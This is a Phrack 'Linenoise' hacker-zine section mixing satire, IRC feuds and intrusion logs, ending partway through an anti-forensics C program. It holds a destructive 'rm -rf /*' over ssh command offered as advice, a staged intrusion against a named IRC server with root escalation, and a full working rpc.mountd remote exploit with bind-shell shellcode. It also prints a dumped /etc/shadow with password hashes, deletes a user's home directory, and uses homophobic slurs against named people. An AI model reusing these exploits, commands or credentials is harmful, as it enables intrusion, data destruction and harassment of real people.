                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x0f

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|




--[ Contents

  1 - A Phrack Editorial Correction
  2 - A Phrack Editorial Correction Part II
  3 - Getting the rm -rf d0wn p@
  4 - This is What Happens When You Talk Shit
  5 - Keeping 0day Safe
  6 - Tripwire is Silly
  7 - Evil Shellcode Developments
  8 - Really Dangerous Cisco Shit Released
  9 - The Defcon Review
 10 - pr0ix IRC Medley
 11 - Project Honeynet Enumeration
 12 - Sebek Sucks
 13 - Bluebox Infoz




|=[ 0x01 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction
by an apologetic phr4ck-st4ff

Phrack would like to apologize for a misprint in our phrack 61 edition!
Apparently the table of contents read as such: "Polymorphic Shellcode Engine
(.txt) 3 gay d00dz"
This should be amended to say "4 gay d00dz" as there were four authors: 
theo detristan theo@ringletwins.com
tyll ulenspiegel tyllulenspiegel@altern.org
yann_malcom yannmalcom@altern.org 
mynheer superbus von underduk msvu@ringletwins.com 
Our wonderful phrack authors were very upset by this misprint, and we would
like to say sorry for neglecting any of our gay gay dungeons+dragonz playing
friends.




|=[ 0x02 ]=--------------------------------------------------------------=|

A Phrack Editorial Correction Part II
by an apologetic phr4ck-st4ff

O'Reilly is suing phrack magazine for plagiarism!
Apparently Hijacking Linux Page Fault Handler (.txt) by "buffer" was ripped
directly from the O'Reilly's Understanding the Linux Kernel series,
practically word-for-word.
Stand by and join hands while phrack staff laughs, since phrack isn't subject
to copyright laws. In fact, phrack isn't subject to any human laws!




|=[ 0x03 ]=--------------------------------------------------------------=|

Getting the rm -rf d0wn p@
by Kar3l3ss k4rl

the other day some faggot on efnet was talking shit 2 me so i decided to
take him out.
i fired up kontr0l p4n3l | stored user names and passwords
i did a whois on irc to find his host name, found the box in my big list,
and then i issued something like the following on my shell:
ssh -lroot blah.com "rm -rf /*" &
and i left the process in the background to do it magic, assuming it would
disconnect me when the computer was obliter8d.
imagine my surpr1ze when my target continued talking shit on irc a few minutes
later.apparently, some variantz where rm is aliased to 'rm -i' prevent rm -rf
madness!
thus my stealthy hard drive removal failed!

the "rm -i" alias stopping attacks is a very real threat!
our solution was swift and simple:
always be sure to issue the following command:
yes | ssh -lroot blah.com "rm -rf /*" &




|=[ 0x04 ]=--------------------------------------------------------------=|

This is What Happens When You Talk Shit
by the b1g leb0wsk1


2nd Sept 2003 - pr0ix wages war on #phrack

<dvdman_> greets pr0ix
<pr0ix> greets dvd
<dvdman_> you gonna give phrack hell?
<pr0ix> yeah
<dvdman_> cool
<pr0ix> fuck then rad up stargliders.org/phrack/opencult/
<dvdman_> add a few ./s for me
<dvdman_> "{
<pr0ix> they are toooooooooo gay
<dvdman_> :P even
---
a bit later
---
<dvdman_> im guessing SLY packet kid is you?
<pr0ix> lets DDDOS them
<dvdman_> HAA
<dvdman_> open a nice bgp
---

After the clear threat of DDoS from the self-proclaimed "Prince of packets" pr0ix, #phrack strikes back...

.----------------------------------------- --  -
| pr0ix (pr0ix@apollo.hack.co.za) (South Africa)
: ircname  : no justice - no peace
| server   : irc.servercentral.net (chase the dragon)

-:- BitchX: Checking tables...
-:- BitchX: nslookup of pr0ix!pr0ix@apollo.hack.co.za failed.

Hmmm... pr0ix thinks his spoof can protect him but thanks to an anonymous supporter,

-gaypr0ix(d0rknet@i.hate.pr0ix)- pr0ix is on irc.scservers.com.

evil:~# host irc.scservers.com
irc.scservers.com       A       64.202.97.154
evil:~#

Ok, lets see if our unpublished 0dayz will work? :PpPPpPPpPPPpPpPpPp

evil:~# nc irc.scservers.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 05 Sep 2003 16:25:37 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux)

Lets go...

evil:~# ./a.out -v64.202.97.154 -p80 -o12 -t6

Attacking 64.202.97.154:80 - Apache 1.3.27

progress[#######]

Linux irc.scservers.com 2.4.1-008stab043.15.swsoft-smp #1 SMP Thu Mar 20 16:47:30 MSK 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)
id pr0ix
uid=512(pr0ix) gid=512(pr0ix) groups=512(pr0ix)
#hohoho time for more skillz

whereis suexec
suexec: /usr/sbin/suexec /usr/share/man/man8/suexec.8.gz
ls -al /usr/sbin/suexec
-r-s--x---    1 root     apache      11732 May 15 06:09 /usr/sbin/suexec
cat << EOF >> suexp.c
/* REMOVED - sorry kids
 * Phrack supports Non-disclosure
 */
EOF
make suexp
cc     suexp.c   -o suexp
./suexp -t6
id
uid=0(root) gid=0(apache) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#h3h3h3

ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
 7200 pts/6    S      0:00 grep pr0ix
ls -al ~pr0ix

total 26731
drwx------    6 pr0ix    pr0ix        2048 Sep  5 08:26 .
drwxr-xr-x   37 root     root         1024 Aug 26 08:47 ..
-rw-rw-r--    1 pr0ix    pr0ix           5 Jan 10  2003 1
-rw-r--r--    1 pr0ix    pr0ix     5261404 Jan 16  2003 8310mcu554.zip
-rw-r--r--    1 pr0ix    pr0ix        3975 Sep  5 03:15 ao.tgz
-rw-------    1 pr0ix    pr0ix       13253 Sep  5 08:26 .bash_history
-rw-rw-r--    1 pr0ix    pr0ix      144847 Dec 26  2002 .bash_history.save
-rw-r--r--    1 pr0ix    pr0ix          24 Oct  7  2002 .bash_logout
-rw-r--r--    1 pr0ix    pr0ix         244 Oct  7  2002 .bash_profile
-rw-r--r--    1 pr0ix    pr0ix         124 Oct  7  2002 .bashrc
drwx------    4 pr0ix    pr0ix        1024 Aug 29 06:15 .BitchX
-rw-rw-r--    1 pr0ix    pr0ix          36 Jul 29 02:36 .bitchxrc
-rw-r--r--    1 pr0ix    pr0ix       80687 Aug  5 09:19 blah2.jpg
-rw-r--r--    1 pr0ix    pr0ix       61861 Aug  6 11:47 blah.jpg
-rw-r--r--    1 pr0ix    pr0ix      816279 Jan 16  2003 b.zip
-rw-r--r--    1 pr0ix    pr0ix      441952 Aug 11 09:13 CANVAS3_VivianLi.rar
-rw-r--r--    1 pr0ix    pr0ix     2353357 Aug  6 11:48 cv4.zip
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:49 dcom.c
-rw-r--r--    1 pr0ix    pr0ix       15836 Aug  5 08:53 dcom-cygwin-harq.c
-rw-r--r--    1 pr0ix    pr0ix       14336 Aug  5 08:53 dcom-cygwin-harq.exe
-rw-r--r--    1 pr0ix    pr0ix       18983 Aug  5 09:18 dcom-liunx-harq
-rw-r--r--    1 pr0ix    pr0ix       14822 Aug  5 09:18 dcom-liunx-harq.c
-rw-rw-r--    1 pr0ix    pr0ix         487 Jun  7  2002 FILE_ID.DIZ
-rw-rw-r--    1 pr0ix    pr0ix        2621 Jul 25 10:17 heh
-rw-r--r--    1 pr0ix    pr0ix        4070 Aug 11 09:08 mircexploit-v6.03.c
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 10  2003 .ncftp
-rw-rw-r--    1 pr0ix    pr0ix        1356 Mar 13  2000 new.c
-rw-rw-r--    1 pr0ix    pr0ix      286795 Jun  7  2002 NOKIA_8310_SERVICE_BULLETIN_v1_0-ROYAL.rar
-rw-r--r--    1 pr0ix    pr0ix       12058 Jul 23 02:24 opcode.exe
-rw-rw-r--    1 pr0ix    pr0ix      825624 Jan 10  2003 Picture 001.jpg
drwxr-xr-x    2 pr0ix    pr0ix        1024 Jan 16  2003 public_html
-rw-r--r--    1 pr0ix    pr0ix      794624 Aug  6 08:33 RetinaRPCDCOM.exe
-rw-r--r--    1 pr0ix    pr0ix      290419 Jan 16  2003 rn8310sb.zip
-rw-rw-r--    1 pr0ix    pr0ix       12945 Jan  9  2003 root.c
-rw-rw-r--    1 pr0ix    pr0ix       15681 Jun  8  2002 ROYAL.NFO
-rw-r--r--    1 pr0ix    pr0ix       22317 Aug  4 14:52 rpc-int.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 10:15 rpctest-1026.exe
-rw-r--r--    1 pr0ix    pr0ix       16384 Aug  6 08:28 rpctest.exe
-rw-r--r--    1 pr0ix    pr0ix       11712 Aug  6 08:28 rpctest.rar
-rw-r--r--    1 pr0ix    pr0ix       12834 Apr 19 05:48 sormount.c
drwx------    2 pr0ix    pr0ix        1024 Sep  1 07:23 .ssh
-rw-rw-r--    1 pr0ix    pr0ix    15384575 Aug  5 05:31 synlog1
-rw-r--r--    1 pr0ix    pr0ix         349 Apr 21 13:41 targets
-rw-r--r--    1 pr0ix    pr0ix       15305 Aug  4 14:42 universal.c.txt
-rw-r--r--    1 pr0ix    pr0ix           0 Aug 20 04:39 upload.html
-rwxrwxr-x    1 pr0ix    pr0ix         112 May 14  2002 vhosts.sh
-rw-------    1 pr0ix    pr0ix        1778 Aug 26 04:33 .viminfo
-rw-r--r--    1 pr0ix    pr0ix       17025 Jul 31 02:47 win32dcom.cpp
-rw-r--r--    1 pr0ix    pr0ix      159802 Aug 11 02:21 win32dcom.exe
-rw-rw-r--    1 pr0ix    pr0ix       85136 Aug 30 18:04 zasta.JPG
-rw-r--r--    1 pr0ix    pr0ix       10240 Oct 14  2002 zones.tar
#HmMmmMMMmmMMm... pr0ix needs to get more codes for us :((((
#At phrack we like to give something back to our supporterz

cat sormount.c

/*
 * remote exploit for rpc.mountd (nfs-utils <= 1.0.3)
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * The problem lies in xlog() where the following code exists:
 * if ((n = strlen(buff)) > 0 && buff[n-1] != '\n') {
 *      buff[n++] = '\n'; buff[n++] = '\0';
 * }
 *
 * a NULL byte will overflow buff, thus overwriting the LSB of the frame pointer.
 *
 * We do not control the area pointed by the new frame pointer, but we do control the area
 * of &hp (in auth_authenticate()), thus we can overwrite hp and make it point to an area we like.
 * hp will get free()d so we can make it point to our fake chunk which can overwrite ebp+4, which 
 * is the area ret will look for its return address (when ebp is copied to stack pointer and the 
 * ret is popped when leaving auth_authenticate()). 
 *
 * Have fun
 *
 * Greetz: gunzip@ircnet
 *
 */



#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <rpcsvc/mount.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
                     



char shellcode[] =
/* port bind tcp/30464 ***/

/* jump 10 */
"\xeb\x0a"
/* overwritten bit */
"neveznevez"

/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0"                      // xorl    %eax,%eax
"\x31\xdb"                      // xorl    %ebx,%ebx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x31\xd2"                      // xorl    %edx,%edx
"\xb0\x66"                      // movb    $0x66,%al
"\xb3\x01"                      // movb    $0x1,%bl
"\x51"                          // pushl   %ecx
"\xb1\x06"                      // movb    $0x6,%cl
"\x51"                          // pushl   %ecx
"\xb1\x01"                      // movb    $0x1,%cl
"\x51"                          // pushl   %ecx
"\xb1\x02"                      // movb    $0x2,%cl
"\x51"                          // pushl   %ecx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xcd\x80"                      // int     $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin,  sizeof(sin) ) */
"\xb3\x02"                      // movb    $0x2,%bl
"\xb1\x02"                      // movb    $0x2,%cl
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x51"                          // pushl   %ecx
"\x51"                          // pushl   %ecx
"\x51"                          // pushl   %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77"                  // addb    $0x77,%cl
"\x66\x51"                      // pushl   %cx
"\xb1\x02"                      // movb    $0x2,%cl
"\x66\x51"                      // pushw   %cx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xb2\x10"                      // movb    $0x10,%dl
"\x52"                          // pushl   %edx
"\x51"                          // pushl   %ecx
"\x50"                          // pushl   %eax
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x89\xc2"                      // movl    %eax,%edx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x66"                      // movb    $0x66,%al
"\xcd\x80"                      // int     $0x80

/* listen(fd, 1) */
"\xb3\x01"                      // movb    $0x1,%bl
"\x53"                          // pushl   %ebx
"\x52"                          // pushl   %edx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x66"                      // movb    $0x66,%al
"\x80\xc3\x03"                  // addb    $0x3,%bl
"\xcd\x80"                      // int     $0x80

/* cli = accept(fd, 0, 0) */
"\x31\xc0"                      // xorl    %eax,%eax
"\x50"                          // pushl   %eax
"\x50"                          // pushl   %eax
"\x52"                          // pushl   %edx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\xb3\x05"                      // movl    $0x5,%bl
"\xb0\x66"                      // movl    $0x66,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 0) */
"\x89\xc3"                      // movl    %eax,%ebx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movb    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 1) */
"\x41"                          // inc     %ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movl    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* dup2(cli, 2) */
"\x41"                          // inc     %ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x3f"                      // movb    $0x3f,%al
"\xcd\x80"                      // int     $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb"                      // xorl    %ebx,%ebx
"\x53"                          // pushl   %ebx
"\x68\x6e\x2f\x73\x68"          // pushl   $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl   $0x69622f2f
"\x89\xe3"                      // movl    %esp,%ebx
"\x8d\x54\x24\x08"              // leal    0x8(%esp),%edx
"\x31\xc9"                      // xorl    %ecx,%ecx
"\x51"                          // pushl   %ecx
"\x53"                          // pushl   %ebx
"\x8d\x0c\x24"                  // leal    (%esp),%ecx
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x0b"                      // movb    $0xb,%al
"\xcd\x80"                      // int     $0x80

/* exit(%ebx) */
"\x31\xc0"                      // xorl    %eax,%eax
"\xb0\x01"                      // movb    $0x1,%al
"\xcd\x80";                     // int     $0x80



/* OK here are the instructions to get offsets:
 * align:
 * gdb /usr/sbin/rpc.mountd <pid of mountd>
 * press c
 * run ./exploit -t 1 -a 0 -v 127.0.0.1
 * it will segfault and do info r edx
 * repeats steps (incrementing align untill edx = 0x4141414e
 *
 * ebp: 
 * gdb, press c, run exploit, it will seg, type up, and info r ebp
 * it should end with 00.. that is ur ebp
 *
 * path:
 * gdb, press c, run exploit, it will seg
 * type maintenance info sections, and get end of .bss section (where heap starts)
 * do something like x/100000bx 0x08058ce4 where  is end of .bss
 * press enter untill you find a bunch of 0x41
 * look for 0x2f    0x41    0x41    0x41
 * 0x2f == '/' which is the start of path. The address of 0x2f is the address of path
 *
 */ 
struct target_info {
        char *desc;             /* description */
        int align;              /* will be 0,1,2,3 */
        int ebp;                /* what ebp will look like once overwritten */
        int path;               /* address of path variable on heap */
};



struct target_info targets[] = {
        { "Slackware 8.1",3,0xbfffe000,0x805d17c },
        { "Slackware 8.0",2,0xbfffe100,0x805d7bc },
        { "Debug (gdb)",0,0xbfffe100,0x41414142 }
};


#define TIMEOUT 5       /* timeout for rpc request in seconds */





bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) {
   return xdr_string(xdrs, objp, MNTPATHLEN);
}



   
/* try to connect to the shell */
void ride(char *ip) {
        fd_set rfds;
        int rd;
        int s;
        struct sockaddr_in s_in;
        char buff[1024];

        s_in.sin_port = htons(30464);
        s_in.sin_family = PF_INET;
        s_in.sin_addr.s_addr = inet_addr(ip);

        s = socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
        if(s < 0) {
                perror("socket()");
                exit(-1);
        }

        if(connect(s,(struct sockaddr *)&s_in,sizeof(s_in)) < 0) {
                close(s);
                return; /* failed */
        }


        /* successs */
        send(s,"id;\n",4,0);

        while(1) {
                FD_ZERO(&rfds);
                FD_SET(0, &rfds);
                FD_SET(s, &rfds);

                if(select(s+1, &rfds, NULL, NULL, NULL) < 1)
                        exit(0);

                if(FD_ISSET(0,&rfds)) {
                        if( (rd = read(0,buff,sizeof(buff))) < 1)
                                exit(0);
                        if( send(s,buff,rd,0) != rd)
                                exit(0);

                }
                if(FD_ISSET(s,&rfds)) {
                        if( (rd = recv(s,buff,sizeof(buff),0)) < 1)
                                exit(0);
                        write(1,buff,rd);
                }
        }
}
 


void exploit(struct target_info target, char *ip) {
        char egg[1024];
        dirpath eggd;
        int *ptr;
        CLIENT *client;
        int s;
        struct sockaddr_in s_in;
        struct timeval tv;
        char chunk[] =  "\xfc\xff\xff\xff"      /* prevsize */
                        "\xfc\xff\xff\xff"      /* size */
                        "\xa1\xff\xff\xbf"      /* junk */
                        "\xa1\xff\xff\xbf"      /* bk */
                        "\xa1\xff\xff\xbf";     /* fd */
                                                                                                        

        /* initial set up note it must start with / */
        memset(egg,'A',sizeof(egg));
        egg[sizeof(egg)-1] = 0;
        egg[0] = '/';


        /* fill up with address of our fake chunk */
        printf("Address of fake chunk= 0x%x\n",target.path+4+8);
        for(ptr = (int*)((char*)egg+target.align+300);ptr < (int*)&egg[sizeof(egg)-6]; ptr++)
                        *ptr = target.path+4+8;        /* addr of fake chunk */


        /* setup our chunk and copy it in egg */
        ptr = (int*)((char*)chunk+12);  /* bk */
        printf("Addr of ret= 0x%x\n",target.ebp+4);
        *ptr = target.ebp+4-12;         /* addr of ret-12 */
        ptr++;                          /* fd */
        printf("Addr of shellcode= 0x%x\n",target.path+40);
        *ptr = target.path+40;          /* addr of shellcode */
        memcpy(egg+4,chunk,strlen(chunk));


        /* copy our shellcode */
        memcpy(egg+40,shellcode,strlen(shellcode));
        eggd = &egg[0];


        /* connect to mountd and send request */
        s = RPC_ANYSOCK;
        s_in.sin_family = PF_INET;
        s_in.sin_port = 0;
        if(!inet_aton(ip,&s_in.sin_addr)) {
                printf("Invalid ip %s\n",ip);
                exit(-1);
        }
   
        client = clnttcp_create(&s_in,MOUNTPROG, MOUNTVERS, &s, 0, 0);
        if(!client) {
                clnt_pcreateerror("clnttcp_create");
                exit(-1);
        }                                                       
        client->cl_auth = authunix_create_default();

        tv.tv_usec = 0;
        tv.tv_sec = TIMEOUT;

        if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath, (void *)&eggd,(xdrproc_t) xdr_void, NULL,tv) == RPC_SUCCESS) {
                printf("Server managed to mount our path... something went wrong\n");
                exit(-1);
        }

        printf("Exploitation done... attempting to connect to shell\n");
        ride(ip);
        printf("Failed...\n");                                                                                                     
}

void print_targets() {
        int tcount = sizeof(targets)/sizeof(struct target_info);
        int i;

        printf("Id\tDescription\talign\t\tpath\t\tebp\n");

        for(i = 0; i < tcount; i++) {
                printf("%d)\t%s\t%d\t\t0x%x\t0x%x\n",i,
                        targets[i].desc,targets[i].align,targets[i].path,targets[i].ebp);
        }

}


void usage(char *p) {
        printf("Usage: %s <opts>\n",p);
        printf("-t\t\ttarget\n");
        printf("-a\t\talign\n");
        printf("-p\t\tpath\n");
        printf("-e\t\tebp\n");
        printf("-v\t\tvictim ip\n");
        printf("\n");
        print_targets();
        exit(0);
}

int main(int argc, char *argv[]) {
        int opt;
        int t = -1;
        int align = -1;
        int path = -1;
        int ebp = -1;
        char ip[16];

        ip[0] = 0;

        printf("rpc.mountd (nfs-utils <= 1.0.3) remote exploit by sorbo (sorbox@yahoo.com)\n");

        while( (opt = getopt(argc,argv,"t:a:hp:e:v:")) != -1) {
                switch(opt) {
                        case 't':
                                t = atoi(optarg);
                                if(t >= sizeof(targets)/sizeof(struct target_info)) {
                                        printf("Invalid target %d\n",t);
                                        exit(-1);
                                }
                                break;

                        case 'a':
                                align = atoi(optarg);
                                break;

                        case 'p':
                                if(sscanf(optarg,"%x",&path) != 1) {
                                                printf("Invalid path addr\n");
                                                exit(-1);
                                }
                                break;

                        case 'e':
                                if(sscanf(optarg,"%x",&ebp) != 1) {
                                                printf("Invalid ebp addr\n");
                                                exit(-1);
                                }
                                break;

                        case 'v':
                                snprintf(ip,sizeof(ip),"%s",optarg);
                                break;

                        case 'h':
                        default:
                                usage(argv[0]);
                }
        }

        if(t < 0) {
                printf("Select target\n");
                usage(argv[0]);
        }

        if(strlen(ip) == 0) {
                printf("Select victim\n");
                usage(argv[0]);
        }

        if(align != -1)
                targets[t].align = align;
        if(path != -1)
                targets[t].path = path;
        if(ebp != -1)
                targets[t].ebp = ebp;

        printf("Attacking target %s\n",targets[t].desc);
        printf("Align= %d\n",targets[t].align);

        exploit(targets[t],ip);
        exit(0);
}
#WOW thanks phrack!!!

cat /etc/shadow
root:$1$ZJShZBLX$SjDHIWcpO/GA9Dipkod781:11944:0:99999:7:::
bin:*:11915:0:99999:7:::
daemon:*:11915:0:99999:7:::
adm:*:11915:0:99999:7:::
lp:*:11915:0:99999:7:::
sync:*:11915:0:99999:7:::
shutdown:*:11915:0:99999:7:::
halt:*:11915:0:99999:7:::
mail:*:11915:0:99999:7:::
news:*:11915:0:99999:7:::
uucp:*:11915:0:99999:7:::
operator:*:11915:0:99999:7:::
games:*:11915:0:99999:7:::
gopher:*:11915:0:99999:7:::
ftp:*:11915:0:99999:7:::
nobody:*:11915:0:99999:7:::
pcap:!!:11915:0:99999:7:::
apache:!!:11915:0:99999:7:::
mailnull:!!:11915:0:99999:7:::
popa3d:!!:11915:0:99999:7:::
rpm:!!:11915:0:99999:7:::
named:!!:11915:0:99999:7:::
rpc:!!:11915:0:99999:7:::
webadmin:!!:12212:0:99999:7:::
irc:$1$isxQjOdP$6jb3AzTc80L7x3WcCAOF./:12212:0:99999:7:::
ibot:$1$ej3zbkRi$AAY8Xl8Nu9HEJMiNEYvsa/:12212:0:99999:7:::
seiki:$1$l05gX/8m$4I1ILj8n63UameQ5xjTU5/:12212:0:99999:7:::
ara:$1$144rrypI$0lHwNZWRhzJaM4Z.orByK.:12212:0:99999:7:::
darwin:$1$aSsbmEs.$ORLOh7BSFRp44vSpBabwb.:12212:0:99999:7:::
munky:$1$EZOznsYZ$nf1E5sJzcHcRcEHf/zRii1:12212:0:99999:7:::
matthew:$1$LE26nN17$eCfcerAHraiBDREoby7lL1:12212:0:99999:7:::
phelix:$1$4fctwQLD$VNx6x3XEL.FfdbrHUpTBP1:12212:0:99999:7:::
hardy:$1$Fd/NGh3W$GCBjp4D1HQ0H6s9rvueNW/:12212:0:99999:7:::
ident:!!:11942:0:99999:7:::
pr0ix:$1$QE94tcwZ$8jAQqYM4/41TfcguVlvl31:12212:0:99999:7:::
jordan:$1$1off0go6$o29r4O/06IePxER/C67m40:12212:0:99999:7:::
woohah:$1$TWHQOOsM$zKOKWiUg3xwjyJW.hqVh0.:12212:0:99999:7:::
guard:$1$YPOKEA.N$vpINblI9rcqiLSVKwuoF1/:12212:0:99999:7:::
ben:$1$r2m9RMMt$VvMTQP48gzw0ea3oynpwn0:12212:0:99999:7:::
josh:$1$zUB76ytF$nrYsM.IJQ38k0l.Exj8Oh1:12212:0:99999:7:::
mailbox:$1$iAoBTdPK$5jBYGN7NkFEDBPeS.6xJY.:12212:0:99999:7:::
mark:$1$gaxorDr9$HEB0PaTuiRCfy6u9q9nwM/:12212:0:99999:7:::
jsw:$1$VvRVH/ZW$GTszjvXK2d/.hPSayft2G/:12212:0:99999:7:::
syn:$1$PYXWwsBF$A27F8XhxA29FdBCGGCEla.:12212:0:99999:7:::
oiad:$1$2h6x6zGz$F/OtF1.cnoLfIx3fiUVir1:12212:0:99999:7:::
rachel:$1$mWtUDk29$dXrVKWOFGgtOyE1ErJjrm/:12212:0:99999:7:::
douglas:$1$po/d7cUE$v2m0yNiWJoLY2w0i3chZ11:12212:0:99999:7:::
bluerose:$1$HP0fEesQ$5BV0EWfWa9lMXlubq5NcL1:12212:0:99999:7:::
scott:$1$p9J5H0Nw$lTYLtwHboZAu/2k/RFDma1:12212:0:99999:7:::
vcsa:!!:12158:0:99999:7:::
copy:$1$Wvnt5j6M$BxW6elYpZpafw4krGu2HC/:12212:0:99999:7:::
cco:$1$DDCKlJdm$KHb.YwvehZQYaxCcvS2cM0:12212:0:99999:7:::
love:!!:12212:0:99999:7:::
john:$1$CDXsm4w2$xiMBwHTGl7IYtyGfmbosH/:12227:0:99999:7:::
jason:$1$QQl/aoQJ$wGoavhKLO7HsBsdRgmAA3/:12212:0:99999:7:::
sojobo:$1$ewLrMMqk$lfq1IMngSrJxjDfC8pAvO0:12215:0:99999:7:::
fpod:$1$27XuryQQ$3Wk/f9yoQthayOqNB0RnR0:12277:0:99999:7:::
asr:$1$VDZ6Xwti$/FRsuaNxU64rBVaeVP3x8/:12278:0:99999:7:::
mjp:$1$W3bmCP6X$ov1/Qm2FpS.mjdgioDh4e1:12290:0:99999:7:::

#cool! our old friend seiki ;PpPPPpPPpPPppPP

ps ax | grep pr0ix
29004 pts/0    S      0:21 BitchX pr0ix irc.servercentral.net
28828 pts/6    S      0:00 grep pr0ix
kill -9 29004

-:- SignOff pr0ix: #darknet (EOF from client) # bye bye pr0ix :(

w
 12:16pm  up 148 days, 21:00, 10 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
pr0ix    pts/0    reptile.cube11.n Mon 9am  2:15m 30.11s  8.80s  scr-bx 
mjp      pts/2    ool-18b92e85.dyn  8:11am  3:23   0.11s  0.07s  screen -r 
mjp      pts/3    -                 8:11am  4:04m  0.11s  0.11s  /bin/bash 
munky    pts/5    -                 6:51am  2:28m  8:00   8:00   BitchX 
seiki    pts/11   -                10:35am 18:41   2:53   2:53   irssi 
ara      pts/4    -                Tue 8am 25:12m  2:04   2:04   BitchX irc.servercentral.net 
munky    pts/13   207.91.250.66     6:51am  2:28m  0.10s  0.03s  screen -r 
ara      pts/16   209-102-214-3.ip Tue 8am 25:12m  1.10s  1.04s  screen -r 
seiki    pts/18   user-0cceoih.cab 10:27am 18:41   0.11s  0.05s  screen -dr 
mjp      pts/20   -                 8:11am  3:23  18.70s 18.70s  ssh

#ok, im bored now... rm'in time!!!!
rm -rf ~pr0ix
ls -ald ~pr0ix
ls: ~pr0ix: No such file or directory
mkdir /home/pr0ix
chown pr0ix.pr0ix /home/pr0ix
cd /home/pr0ix
touch PHRACK_OWNS_J00

# Phrack 8==================D ~~~~~~~~~ pr0ix

^C
evil:~# ~pr0ix COMING SOON !!!




|=[ 0x05 ]=--------------------------------------------------------------=|

Keeping 0day safe
by anonymous

/*
 * Apparently honeynet has new ideas of how to steal your warez!
 * They're more sophisticated than ever!
 * Not just to be confined to HD MOORE sitting alone in a room, reading
 * full tcpdump logs (like shimomura) and piecing together the exploits into
 * his elite perl scripts for metadata.
 *
 * Now, the strategy is to let lamers compile exploits on owned boxes, and
 * copy them over into safe storage when unlink() is called.... for example,
 * temporary gcc assembly and preprocessor files will be backed up, leaving
 * your original code for lance spitzner to sed /s/.. your name out of the
 * headers, replace your name with his, sell it to iDEFENSE, and hail it as
 * another victory for project honeynet.
 *
 * No more! Compile this and LD_PRELOAD or LD_LIBRARY_PATH it before whatever
 * you do. Yea I know this code is lame, but if it prevents 0day from getting
 * lost than it was probably worth the 5 minutes.
 *
 * gcc -Wall -fpic -c pre_unlink.c
 * ld -Bshareable -o pre_unlink.so pre_unlink.o
 * and change "LIBC_PATH" to the path of libc on your system
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <dlfcn.h>
#include <errno.h>


#define DEBUG   1
#define LIBC_PATH       "/usr/lib/libc.so.12"
#define RANDOM_PATH     "/dev/urandom"
#define BLOCK_SIZE      4096


int (*xunlink) (const char *);
int unlink (const char *path);
void get_random_data (int fd, unsigned int len);


/* uh oh this function doesn't comply with the 52 pass secure dod wipe, so i'm sure
   michael zalewski or dvdman will publish an advisory soon but who karez cuz
   everybody knowz electron micr0sk0pez r used 4 microbiology not forensix */

void
get_random_data (int fd, unsigned int len)
{
        static int is_open = 0;
        static int randfd;
        char buf[BLOCK_SIZE];

        if (!is_open)
        {
                randfd = open (RANDOM_PATH, O_RDONLY);

                if (randfd < 0)
                {
                        perror ("open");
                        fprintf (stderr, "Error opening random data file: %s\n", RANDOM_PATH);
                        exit (EXIT_FAILURE);
                }

                is_open = 1;
        }

        memset (buf, 0x41, sizeof (buf));

        if (read (randfd, buf, len) != len)
        {
                perror ("read");
                fprintf (stderr, "Error fetching random data!\n");
                exit (EXIT_FAILURE);
        }

        if (write (fd, buf, len) != len)
        {
                perror ("write");
                fprintf (stderr, "Error writing random data!\n");
                exit (EXIT_FAILURE);
        }

        return;
}



int
unlink (const char *path)
{
        struct stat sb;
        int fd, result;
        unsigned int i;

#ifdef DEBUG
        fprintf (stderr, "unlink(%s) ...\n", path);
#endif

        if (stat (path, &sb) < 0)
        {
                perror ("stat");
                fprintf (stderr, "unlink() on %s: unable to stat this file.\n", path);

                if (errno == ENOENT)
                        goto do_unlink;

                exit (EXIT_FAILURE);
        }

        if ((fd = open (path, O_RDWR)) < 0)
        {
                perror ("open");
                fprintf (stderr, "unlink() on %s: unable to open this file for writing.\n",
                        path);

                if (errno == ENOENT)
                        goto do_unlink;

                exit (EXIT_FAILURE);
        }

        for (i = 0; i < sb.st_size; )
        {
